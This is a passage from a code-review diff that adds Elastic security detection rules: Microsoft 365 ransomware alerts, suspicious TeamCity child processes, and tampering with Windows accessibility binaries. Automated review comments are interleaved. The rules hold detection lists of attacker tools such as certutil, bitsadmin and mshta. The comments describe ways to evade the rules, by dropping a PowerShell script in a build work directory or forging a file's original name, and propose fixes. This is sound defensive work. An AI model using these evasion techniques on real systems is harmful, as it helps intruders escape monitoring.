"setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + 
{ + "id": "T1486", + "name": "Data Encrypted for Impact", + "reference": "https://attack.mitre.org/techniques/T1486/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "721999d0-7ab2-44bf-b328-6e63367b9b29_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/730ed57d-ae0f-444f-af50-78708b57edd5_1.json b/packages/security_detection_engine/kibana/security_rule/730ed57d-ae0f-444f-af50-78708b57edd5_1.json new file mode 100644 index 00000000000..ff824581e39 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/730ed57d-ae0f-444f-af50-78708b57edd5_1.json 
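Review bot: The rule ships with `"note": ""`, so an analyst who receives this alert gets no triage guidance, and the single `false_positives` entry ("If Cloud App Security identifies ... a high rate of file uploads or file deletion activities it may represent an adverse encryption process") describes the detection condition itself rather than a benign cause. Since the query only forwards Microsoft's own alert (`event.action:"Potential ransomware activity"`), a short note pointing the analyst at the originating Defender for Cloud Apps alert, the user, and the uploaded files would make the alert actionable, and the false-positive text should name a benign trigger, for example a sanctioned bulk migration or re-encryption of files by an approved tool. The `"Use Case: Configuration Audit"` tag also does not fit an impact/ransomware behaviour alert; `"Use Case: Threat Detection"` matches the other rules in this change.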
@@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious processes being spawned by the JetBrain TeamCity process. This activity could be related to JetBrains remote code execution vulnerabilities.", + "false_positives": [ + "Powershell and Windows Command Shell are often observed as legit child processes of the Jetbrains TeamCity service and may require further tuning." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious JetBrains TeamCity Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.executable :\n (\"?:\\\\TeamCity\\\\jre\\\\bin\\\\java.exe\",\n \"?:\\\\Program Files\\\\TeamCity\\\\jre\\\\bin\\\\java.exe\",\n \"?:\\\\Program Files (x86)\\\\TeamCity\\\\jre\\\\bin\\\\java.exe\",\n \"?:\\\\TeamCity\\\\BuildAgent\\\\jre\\\\bin\\\\java.exe\") and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"msiexec.exe\", \"certutil.exe\", \"bitsadmin.exe\", \"wmic.exe\", \"curl.exe\", \"ssh.exe\",\n \"rundll32.exe\", \"regsvr32.exe\", \"mshta.exe\", \"certreq.exe\", \"net.exe\", \"nltest.exe\", \"whoami.exe\", \"hostname.exe\",\n \"tasklist.exe\", \"arp.exe\", \"nbtstat.exe\", \"netstat.exe\", \"reg.exe\", \"tasklist.exe\", \"Microsoft.Workflow.Compiler.exe\",\n \"arp.exe\", \"atbroker.exe\", \"bginfo.exe\", \"bitsadmin.exe\", \"cdb.exe\", \"cmstp.exe\", \"control.exe\", \"cscript.exe\", \"csi.exe\",\n \"dnx.exe\", \"dsget.exe\", \"dsquery.exe\", \"forfiles.exe\", \"fsi.exe\", \"ftp.exe\", \"gpresult.exe\", \"ieexec.exe\", \"iexpress.exe\",\n \"installutil.exe\", \"ipconfig.exe\",\"msxsl.exe\", \"netsh.exe\", \"odbcconf.exe\", \"ping.exe\", \"pwsh.exe\", \"qprocess.exe\",\n \"quser.exe\", \"qwinsta.exe\", \"rcsi.exe\", \"regasm.exe\", \"regsvcs.exe\", \"regsvr32.exe\", 
\"sc.exe\", \"schtasks.exe\",\n \"systeminfo.exe\", \"tracert.exe\", \"wmic.exe\", \"wscript.exe\",\"xwizard.exe\", \"explorer.exe\", \"msdt.exe\") and\n not (process.name : \"powershell.exe\" and process.args : \"-ExecutionPolicy\" and process.args : \"?:\\\\TeamCity\\\\buildAgent\\\\work\\\\*.ps1\") and\n not (process.name : \"cmd.exe\" and process.args : \"dir\" and process.args : \"/-c\")\n", + "references": [ + "https://www.trendmicro.com/en_us/research/24/c/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "730ed57d-ae0f-444f-af50-78708b57edd5", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + 
"reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "730ed57d-ae0f-444f-af50-78708b57edd5_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_109.json b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_109.json new file mode 100644 index 00000000000..2a9c1467639 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_109.json 
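Review bot: The PowerShell exclusion near the end of `query`, `not (process.name : "powershell.exe" and process.args : "-ExecutionPolicy" and process.args : "?:\\TeamCity\\buildAgent\\work\\*.ps1")`, is a wildcard on a directory that build jobs write to, so anyone who can create or edit a build configuration after exploiting the server can drop a payload as `*.ps1` under `buildAgent\work`, run it with `-ExecutionPolicy`, and silence the rule regardless of which parent spawned it. Because the parent list covers both the server JRE (`?:\\TeamCity\\jre\\bin\\java.exe`) and the agent JRE (`?:\\TeamCity\\BuildAgent\\jre\\bin\\java.exe`), the exclusion could at least be scoped to the agent parent, if that is the only legitimate launcher of those scripts: `not (process.parent.executable : "?:\\TeamCity\\BuildAgent\\jre\\bin\\java.exe" and process.name : "powershell.exe" and process.args : "-ExecutionPolicy" and process.args : "?:\\TeamCity\\buildAgent\\work\\*.ps1")`, so the same command line spawned by the server process (the RCE case this rule targets) still alerts. Separately, the `process.name` list repeats `tasklist.exe`, `arp.exe`, `bitsadmin.exe`, `wmic.exe` and `regsvr32.exe`; dropping the duplicates is harmless and makes the list easier to audit. The rule also has no `note` investigation guide and no `setup` section, unlike the other rules in this change.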
@@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Windows contains accessibility features that may be launched with a key combination before a user has logged in. An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Modification of Accessibility Binaries", + "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service 
Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"Utilman.exe\", \"winlogon.exe\") and user.name == \"SYSTEM\" and\n process.pe.original_file_name : \"?*\" and\n process.args :\n (\n \"C:\\\\Windows\\\\System32\\\\osk.exe\",\n \"C:\\\\Windows\\\\System32\\\\Magnify.exe\",\n \"C:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"C:\\\\Windows\\\\System32\\\\Sethc.exe\",\n \"utilman.exe\",\n \"ATBroker.exe\",\n \"DisplaySwitch.exe\",\n \"sethc.exe\"\n )\n and not process.pe.original_file_name in\n (\n \"osk.exe\",\n \"sethc.exe\",\n \"utilman2.exe\",\n \"DisplaySwitch.exe\",\n \"ATBroker.exe\",\n \"ScreenMagnifier.exe\",\n \"SR.exe\",\n \"Narrator.exe\",\n \"magnify.exe\",\n \"MAGNIFY.EXE\"\n )\n\n/* uncomment once in winlogbeat to avoid bypass with rogue process with matching pe original file name */\n/* and process.code_signature.subject_name == \"Microsoft Windows\" and process.code_signature.status == \"trusted\" */\n", + "references": [ + "https://www.elastic.co/blog/practical-security-engineering-stateful-detection" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.008", + "name": "Accessibility Features", + "reference": "https://attack.mitre.org/techniques/T1546/008/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.008", + "name": "Accessibility Features", + "reference": "https://attack.mitre.org/techniques/T1546/008/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": 
"7405ddf1-6c8e-41ce-818f-48bea6bcaed8_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_110.json b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_110.json new file mode 100644 index 00000000000..e42d5b5fe73 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_110.json 
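Review bot: The commented-out guard at the end of `query`, `/* and process.code_signature.subject_name == "Microsoft Windows" and process.code_signature.status == "trusted" */`, reads as inverted relative to its own comment: AND-ing it onto the existing `not process.pe.original_file_name in (...)` would restrict alerts to Microsoft-signed binaries, whereas the bypass it names, a rogue binary whose PE OriginalFilename is forged to `osk.exe`, `sethc.exe`, etc., is only caught if an untrusted or non-Microsoft signature is an alternative trigger. Something like `and (not process.pe.original_file_name in (...) or not (process.code_signature.subject_name == "Microsoft Windows" and process.code_signature.status == "trusted"))` would express the stated intent; as it stands the whole detection hinges on an attacker-controlled PE header field, which the comment itself acknowledges. The `index` list already includes `logs-endpoint.events.*`, which presumably carries `process.code_signature` fields; that should be confirmed against the endpoint integration's mappings before the check is enabled, and the stale "once in winlogbeat" wording replaced with whatever the actual blocker is.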
@@ -0,0 +1,130 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Windows contains accessibility features that may be launched with a key combination before a user has logged in. An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Modification of Accessibility Binaries", + "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service 
Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"Utilman.exe\", \"winlogon.exe\") and user.name == \"SYSTEM\" and\n process.pe.original_file_name : \"?*\" and\n process.args :\n (\n \"C:\\\\Windows\\\\System32\\\\osk.exe\",\n \"C:\\\\Windows\\\\System32\\\\Magnify.exe\",\n \"C:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"C:\\\\Windows\\\\System32\\\\Sethc.exe\",\n \"utilman.exe\",\n \"ATBroker.exe\",\n \"DisplaySwitch.exe\",\n \"sethc.exe\"\n )\n and not process.pe.original_file_name in\n (\n \"osk.exe\",\n \"sethc.exe\",\n \"utilman2.exe\",\n \"DisplaySwitch.exe\",\n \"ATBroker.exe\",\n \"ScreenMagnifier.exe\",\n \"SR.exe\",\n \"Narrator.exe\",\n \"magnify.exe\",\n \"MAGNIFY.EXE\"\n )\n\n/* uncomment once in winlogbeat to avoid bypass with rogue process with matching pe original file name */\n/* and process.code_signature.subject_name == \"Microsoft Windows\" and process.code_signature.status == \"trusted\" */\n", + "references": [ + "https://www.elastic.co/blog/practical-security-engineering-stateful-detection" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.008", + "name": "Accessibility Features", + "reference": "https://attack.mitre.org/techniques/T1546/008/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.008", + "name": "Accessibility Features", + "reference": "https://attack.mitre.org/techniques/T1546/008/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + 
"id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_111.json b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_111.json new file mode 100644 index 00000000000..dfc692efa64 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_111.json 
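Review bot: The `process.args` list in `query` pins four of the accessibility binaries to a fixed drive, `C:\\Windows\\System32\\osk.exe`, `C:\\Windows\\System32\\Magnify.exe`, `C:\\Windows\\System32\\Narrator.exe` and `C:\\Windows\\System32\\Sethc.exe`, while the TeamCity rule in this same change uses the `?:` drive wildcard; a host whose system volume is not `C:` silently misses the full-path form of the trigger. Changing those four entries to `"?:\\Windows\\System32\\osk.exe"` and so on keeps the behaviour on standard installs and closes the gap. This version also narrows `index` from `logs-windows.*` to `logs-windows.sysmon_operational-*` and adds the `Data Source: Sysmon` tag; if that narrowing is deliberate, a line in `setup` stating which Sysmon events the rule needs would save the next reader from guessing.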
@@ -0,0 +1,130 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Windows contains accessibility features that may be launched with a key combination before a user has logged in. An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Modification of Accessibility Binaries", + "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service 
Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
